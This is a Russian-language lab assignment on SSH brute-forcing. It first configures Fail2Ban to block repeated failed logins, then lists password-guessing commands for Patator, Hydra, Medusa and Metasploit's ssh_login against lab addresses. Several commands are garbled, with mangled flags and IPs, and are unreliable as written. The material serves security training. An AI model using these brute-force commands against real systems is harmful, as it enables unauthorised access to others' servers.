# **Практическая работа № 1** **Тема: "Brute-force на SSH"** * 1 шаг - установка Fail2Ban  * 2 шаг - запускаем сервис  * Теперь посмотрим файлы конфигурации  * Нам надо создать фильтр для ssh  * Для того, что применился новый конфигурационный файл перезагружаем сервис.  * Проверим, что fail2ban работает.  * Теперь можно подключиться из другой тачки к нашей, на которой защущен fail2ban  * Как видим, при вводе 3 раза неверного пароля нашу машину блокирует  * Если необходимо разблокировать тачку, используем команду "fail2ban-client unban [ip-адресс]"  ____________________________________________________ **Теперь перейдем к практике по брутфорсу ssh** ~~"Во всех скринах скрыт найденный пароль, так как мои виртуальные тачки используются на постоянной основе."~~ 1.Patator Для подбора пароля средствами Patator используется команда: patator ssh_login host=lll.11.11.11 user=test password=FIIEO O=/root/wordlist -х ignore:mesg='Authentication failed'  2.Hydra Для подбора пароля с помощью Hydra используется команда: hydra -V -f -t 4 -1 test -Р /root/wordlist ssh://111.11.11.11  3.Medusa Для подбора пароля с помощью Medusa используется команда: medusa -h 192.168.60.50 -u test -Р /root/wordlist -М ssh -f -v 6  4.Metasploit Используем ssh_login, заполняем необходимые опции и брутфорсим.